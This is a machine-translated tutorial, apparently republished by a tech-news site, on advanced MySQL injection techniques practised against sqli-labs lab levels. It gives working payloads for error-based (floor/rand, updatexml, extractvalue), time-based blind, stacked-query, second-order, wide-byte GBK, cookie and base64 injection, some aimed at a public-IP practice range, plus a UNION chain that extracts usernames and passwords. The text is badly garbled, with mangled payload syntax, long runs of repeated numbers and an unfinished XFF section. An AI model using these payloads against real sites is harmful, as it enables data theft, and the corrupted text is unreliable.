Shulou(Shulou.com)05/31 Report--

This article mainly introduces the relevant knowledge of what is the advanced method of SQL injection in web security, the content is detailed and easy to understand, the operation is simple and fast, and has a certain reference value. I believe you will gain something after reading this article on the advanced method of SQL injection in web security. Let's take a look.

The reason for adding limit to select schema_name from information_schema.schemata limit injection attack database (select table_name from information_schema.columns where table_schema='whc' limit mrem n) table lookup (select column_name from information_schema.columns where table_schema='whc' limit 0Power1) lookup field (select column_name from information_schema.columns where table_schema='whc' limit 0Power1) is that the number of echoes is limited in sqllab, which should not be used in combat. 1. Floor mode

Usage:

Select 1bookcount (*), concat (0x3a record0x3a, (select use ()), 0x3arecovery0x3aplaycount (rand (0) * 2)) a from information_schema.columns group by a

Function definition:

The rand () random number function generates 0-1 random numbers count (_) count floor () takes the entire function down, and excludes the decimal point, for example: floor (1. 3) = 1 floor (rand () _ 2) results only 0 and 1 group by name arrange the contents of the concat () connection parenthesis select 1 from (table name) derivative table in the first dictionary order of name.

There are three points here, one is the need for count counting, the second is floor, which gets 0 or 1 to repeat the data, and the third is group by for grouping, but the explanation of the specific principle is not very good. The general principle is the error caused by repeated data counting after grouping. There is also the problem of bug interpreted as mysql. But rand (0) and rand () need to be tried a few more times here.

Actual list:

Test on sqli less-5

Here only use user () to do an example, other burst table, burst field directly replace user () on the line

Id=1' union select 1 from information_schema.columns group by a count (*), concat (0x3a recorder 0x3a recorder user (), 0x3a recorder 0x3a dagger (rand (0) * 2)) a from information_schema.columns group by a-- +

It can be simplified like this:

Id=1' and (select count (*) from information_schema.tables group by concat (0x3a record0x3a recorder version (), 0x3a record0x3a dagger (rand (0) * 2)-- +

It can also be changed to this:

Id=1' and (select 1 from (select count (*), (concat (0x3a) user (), 0x3a (rand () * 2)) name from information_schema.tables group by name) b-+

Statement decomposition:

(select 1 from b) / / make the derived table b=select count (_) on b, name from information_schema.tables group by name / / select the contents and counted contents from information_schema name=concat (0x3a, (query content), 0x3a rand () _ 2) / / put: and query contents, and random integers are connected together exactly why count (_), floor (rand (0) _ 2) group by will report an error It must be said that all three elements must be put in one sentence in order to report an error.

Explain select 1 from table

Its function is to add temporary columns. The column value of each row is the number written after select. In this sql statement, it is 1.

The difference between rand (0) rand (1) and rand ()

Rand () will report an error randomly, that is, it is possible to report an error, sometimes it will not, rand (0) will definitely report an error, and rand (1) will not report an error.

So if you want him to report an error, use rand (0) directly.

2.xpath function:

The two main functions:

Mysql5.1.5

Updatexml (): query and modify xml

Extractvalue (): query and modify xml

Are the biggest 32-bit.

And updatexml (1 and updatexml concat (0 × 26, (version ()), 0 × 26), 1)

And (extractvalue (1) concat (0 × 26, (version ()), 0 × 26)

Sqli-lab less5 Test:

Updatexml ():

Http://192.168.1.180/sqli-labs/Less-5/?id=1' and updatexml (1) concat (0x26) database (), 0x26, 1);-- +

Extractvalue ():

Http://192.168.1.180/sqli-labs/Less-5/?id=1' and extractvalue (1) concat (0x26));-- +

Time blind injection

It differs from Boolean injection in that time injection uses functions such as sleep () or benchmark () to make mysql execution time longer.

Time blind injection is often used in conjunction with IF (expr1,expr2,expr3). This if statement means: if expr1 is TRUE, the return value of IF () is expr2; otherwise, the return value is expr3.

[http://43.247.91.228:84/Less-9/?id=1' and if (length (database] (http://43.247.91.228:84/Less-9/?id=1' and if (length (database) () > 1 http://43.247.91.228:84/Less-9/?id=1' sleep (5), 1)% 23 / / determine how long the database name is.

Http://43.247.91.228:84/Less-9/?id=1' and if (substr (database (), 1jue 1)) ='s immediate recorder sleep (5), 1) / / judge the first word of the database name

Online shooting range

The "id=1'? id=1" page has not changed here, indicating that the previous injection methods are useless, including Boolean blind injection.

To try a time-based blind injection, you need to introduce a mysql built-in function sleep (5), which means that the execution of this function will be delayed by 5 seconds. (each database has its own delay function)

You can use F12 to take a look at the time normally required for the website to process this request.

Verification time blind injection

Enter the http://43.247.91.228:84/Less-9/?id=1 response time within 1 second.

Input: http://43.247.91.228:84/Less-9/?id=1' and sleep (5)% 23 response time is 5 seconds

Use burp to grab the package and use cracking to enumerate the letters of Amurz to get the name of the database.

Time injection code analysis

In the time injection page, the program gets the GET parameter ID, determines whether there are Union dangerous characters in the parameter ID through preg_match, and then splices the parameter ID into the SQL statement. Query the SQL statement from the database and return yes if there is a result, no otherwise. When visiting the page, the code returns YES or no based on the results of the database query, rather than any database in the database, so only yes or no is displayed on a page, unlike Boolean injection, where characters such as sleep are not filtered

Here when you visit id=1' and if (ord (substring (user (), 1Magazine 1)) = 114 substring sleep (3), 1)% 23

Because user () is the ASCII value of the first character'r' of root,root, the if condition in the SQL statement is true. If the sleep (3) is executed, the page will be delayed by 3 seconds. The execution result of the sql statement can be judged by this delay.

Stack query injection attack

Stacked queries can execute multiple statements separated by semicolons (;). Stacked query injection takes advantage of this feature.

'; select if (substr (user (), 1Magne1)) =' ritual recorder sleep (3), 1)% 23 / / use stack injection to obtain data

'; select if (substr ((select table_name form information_schema.tables where table_schema=datables () limit 0Magne1), 1Magne1) =' estranged limit sleep (3), 1)% 23 / / obtain the table name using the heap

Code Analysis of stacking query injection

In the stack injection page, the program obtains the GET parameter ID and uses PDO to query the data, but still splices the parameter ID into the query statement, resulting in PDO does not play the effect of pre-compilation, and the program still has SQL injection loopholes.

When you use POD to execute SQL statements, you can execute multiple statements, but you usually don't get the injection results directly, because POD only returns the results of the first SQL statement, so you can update the data with update or use time blind to get the data in the second statement. Access: dd.php?id=1';select if (ord (substing (user ()), 1Pol 1)) = 114 user sleep (3), 1);% 23:00 execute the sql statement as follows:

SELECT * FROM users where 'id' =' 1century; select if (ord (substring (user (), 1Magne1)) = 114 (3);% 23

At this time, the SQL statement is divided into two, the first SELECT * FROM user where 'id' =' 1' is the code's own selct query, and selct if (ord (substring (user (), 1Jue 1)) = 114 training sleep (3), 1)% 23 is the time-blind statement we constructed.

Secondary injection attack what is secondary injection?

Secondary injection refers to the injection caused by the user input that has been stored (database, file) read and then entered into the SQL query statement.

Secondary injection is a kind of sql injection, but it is more difficult to use than ordinary sql injection, and the threshold for utilization is higher.

The ordinary injection data goes directly into the SQL query, while the secondary injection stores the input data after processing, takes out, and enters the SQL query again.

Secondary injection principle

According to the principle of secondary injection, when inserting data into the database for the first time, only using addslashes or escaping the special characters with the help of get_magic_quotes_gpc, the original data is still retained when writing to the database, but the data itself is still dirty data.

After the data is stored in the database, the developer thinks that the data is reliable. When the next query is needed, the dirty data is taken out directly from the database without further verification and processing, which will result in the secondary injection of SQL. For example, when the data is inserted for the first time, the data is inserted in single quotation marks directly into the database, and then in the process of piecing together in the next use, a secondary injection is formed.

Secondary injection attack real sequence

Shooting range practice address

An example of secondary injection-- SQLIlab lesson-24

To learn SQL injection, you must brush SQLIlab. Here, take SQLIlab lesson-24 as an example, which is also the point of secondary injection. Open the title

The normal procedure for this question is to first sign up for an account, and then logging in will allow you to change your new password:

If you directly attempt to try SQL injection at the login site, payload: admin'# discovery fails:

Look at the source code:

Both username and password at the login are escaped by the mysql_real_escape_string function, and executing the SQL statement directly escapes', so there is no way to cause SQL injection.

Ok, at this point we sign up for a test'# account:

Mysql_escape_string filtering parameters are used when registering users:

But the problem data test'# is still inserted into the database.

In other words, the data escaped by mysql_escape_string is saved in the database and restored. Here is a test:

Back to the topic, at this time, the original password of the test user is test, and we log in as the test'# user, and then change the password

We do not need to fill in current password to change the password of test users:

Let's take another look at the password of the test user:

Ok, let's look at the source code:

The Username is pulled directly from the database without escape processing. The following command is actually executed when updating the user's password:

"UPDATEusers SET PASSWORD='22' where * username='test'#**' and password='$curr_pass'"

Because we store the problem data in the database, and when the program fetches the data in the database, it brings it directly into the code without secondary judgment, resulting in secondary injection.

Secondary injection code analysis

The following code implements a simple user registration function. The program obtains the GET parameter username and parameter password, then splices username and password into the SQL statement, and inserts the insert statement into the database. Because the parameter username is escaped using addslashes, and the parameter password is hashed by MD5, there is no SQL injection vulnerability here.

When accessing username=test'&password=123456, the SQL statement executed is:

Insert into users ('username','password') values (' test\', 'E10ADC3949BA59ABBE56E057F20F883E')

There will be a user named test' in the database

Wide byte injection attack what is wide byte injection?

Nowadays, there are a lot of people coding, most people use unicode to code the program, and websites use utf-8 to unify the international standard. However, there are still many cms, including domestic and foreign (especially non-English-speaking countries), which still use their own set of codes, such as gbk, as their default coding type. There are also some cms in order to consider regular users, so there are two versions of gbk and utf-8. One gbk encodes Chinese characters, occupying 2 bytes. A Chinese character encoded by utf-8 takes up 3 bytes.

As for the principle of mysql wide byte injection, it is because the database uses GBK encoding

Principle of wide byte injection

GBK occupies two bytes

ASCII occupies one byte

The code in PHP is GBK, the function execution adds ASCII encoding (the added symbol is "\"), and the default character set of MYSQL is the wide-byte character set of GBK.

We all know that% df' is escaped by PHP (turn on GPC, use the addslashes function, or icov, etc.), and the single quotation mark is added with a backslash\ to become% df\', where the hexadecimal of\ is% 5C, so now% df\'=% df%5c%27. If the default character set of the program is a wide-byte character set such as GBK, then MySQL will consider% df%5c as a wide character when it uses GBK encoding. That is to say:% df\'=% df%5c%27= quote', it's easy to inject it with single quotation marks.

Wide word byte injection into real column

Sqli-32 question

Test range address

Train of thought:

Because the single quotation marks are filtered, we use% df to eat\, specifically because urlencode (\') =% 5c%27, we add% df before% 5c%27 to form% df%5c%27, and the above-mentioned mysql will treat two bytes as one Chinese character in GBK encoding, the event% df%5c is a Chinese character and% 27 is outside as a separate symbol. At the same time, we have achieved our goal.

Filter out the\ in', for example, if you can construct% *% 5c%5c%27, the latter% 5c will be commented out by the previous% 5c. This is also a method of bypass.

Injection practice:

(1) the construction code is successfully bypassed. The payload is as follows:

Http://localhost:81/sqli-labs-master/Less-32/index.php?id=1%df%27 and 1, 1, 2, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4,

(2) number of order by query fields

Http://localhost:81/sqli-labs-master/Less-32/index.php?id=1%df%27 order by 4murmuri +

(3) union selec federated query

Http://localhost:81/sqli-labs-master/Less-32/index.php?id=0%df%27 union select 1, 2, 2, 3, Murray +

Everything else is the same.

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 and 1, 1, 2, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4,

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 and 1, 1, 2, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 2, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4,

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 oder by 3murmuri +

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=0%df%5c%27 union select 1, 2, 2, 3, Murray +

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1 Magi database (), 3 Murray +

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1, (select group_concat (table_name) from information_schema.tables where table_schema=database ()), 3Murray +

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1, (select group_concat (column_name) from information_schema.columns where table_name='users'), 3Murray +

Http://localhost:81/sqli-labs-master/Less-33/index.php?id=1%df%5c%27 union select 1, (select group_concat (username,password) from users), 3Murray +

Analysis of wide byte injection code

In the wide byte injection page, the program takes the GET parameter ID, escapes the parameter ID with addslashes (), and splices it into the SQL statement for query

The SQL statement executed when accessing id=1':

SELECT * FORM users WHWRE id='1\'

You can see that single quotes are escaped by the escape character "\", so in general, it cannot be injected, but there is a wide byte injection vulnerability here because SET NAMES 'GBK', is executed before the database query to set the encoding to wide byte GBK.

In php, a wide character injection vulnerability may also exist when transcoding through iconv ().

Cookie injection attack

Usually during the development process, our developers will pay special attention to prevent malicious users from carrying out malicious injection operations, so they will filter the incoming parameters appropriately, but very often, because of their different understanding of security technology, some developers will only filter parameters on the data submitted in this way by get,post.

But we know that most of the time, there are not only two ways to submit data, but also one that is often used: request ("xxx"), that is, the request method.

In this way, the parameter values can also be obtained from the parameters submitted by the user, which results in the most basic condition of cookie injection: the request method is used, but only the data submitted by the get\ post method is filtered in the injection protector.

Real Cookie injection attack

Range address

This level is an injection at Cookie. After entering the correct account password, it will jump to the index.php page, as shown below.

At this time, when you visit the login page again, http://43.247.91.228:84/Less-20/ is still the above page, because the information is stored in Cookie after login, and the background makes a judgment. When you find that there is a value in Cookie, the personal information above will be displayed instead of the login box. In which of the above information can be seen, there is an extra Your ID:8, which is likely to be queried from the database. We visit the page again and use burp to grab the package and analyze it.

You can see that there is uname=admin in Cookie, indicating that the background is likely to use the uname in cookie to fetch the database for query operations.

Change the information in cookie to uname=admin'

The page reported an error, and it can be seen from the error message that the background is cobbled together in single quotation marks. There is no need to continue later, join table query, error injection, blind injection are all possible here.

Continue to use burp to enter Cookie: uname=admin' AND UpdateXml (1 uname=admin' AND UpdateXml concat (0x7e, (select username from users LIMIT 1), 0x7e), 1) #

Get:

Cookie injection Code Analysis

Through $COOKIE, you can get the data in the browser cookie, in the cookie injection page, the program gets the parameter ID through $COOKIE, and then splices the ID directly into the slect statement to query, and if there are any results, output the results to the page.

As you can see here, there is a SQL injection vulnerability because the parameter ID in cookie is not filtered and directly spliced into the SQL statement. When you add id=1 union select 1, 2, 2, 3% 23 to cookie, the SQL statement executed is:

Select * from users where 'id'=1 union select 1, 2, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 7, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4

At this time, the SQL statement can be divided into two items: select * from users where 'id' = 1 and union select 1, and the data in the database can be obtained by using the second statement.

[0] Base64 injection attack Base64 injection code analysis

In the base64 injection page, the program obtains the GET parameter ID, uses base64_decode () to decode the parameter ID by base64, and then directly splices the decoded $id into the select statement to query, and outputs the query results to the page through the while loop.

Because the code does not filter the decoded $id and splices $id directly into the SQL statement, there is a SQL injection vulnerability. When accessing id=1 union select 1 and 2, the SQL statement executed is:

Select * from users wheren 'id'=1 union select 1, 2, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 7, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4

At this time, the SQL statement can be divided into two items: select * form users where 'id'=1 and union select 1Jing 2Jing 3. The data in the database can be obtained by using the second statement.

[0] XFF injection attack XFF injection code analysis

The getenv () function in PHP gets the value of an environment variable, similar to $SERVER or $ENV, returns the corresponding value of the environment variable, and returns FALSE if the environment variable does not exist.

The program first determines whether there are HTTP header parameters.

This is the end of the article on "what is the advanced method of SQL injection in web security?" Thank you for reading! I believe you all have a certain understanding of "what is the advanced method of SQL injection in web security". If you want to learn more, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.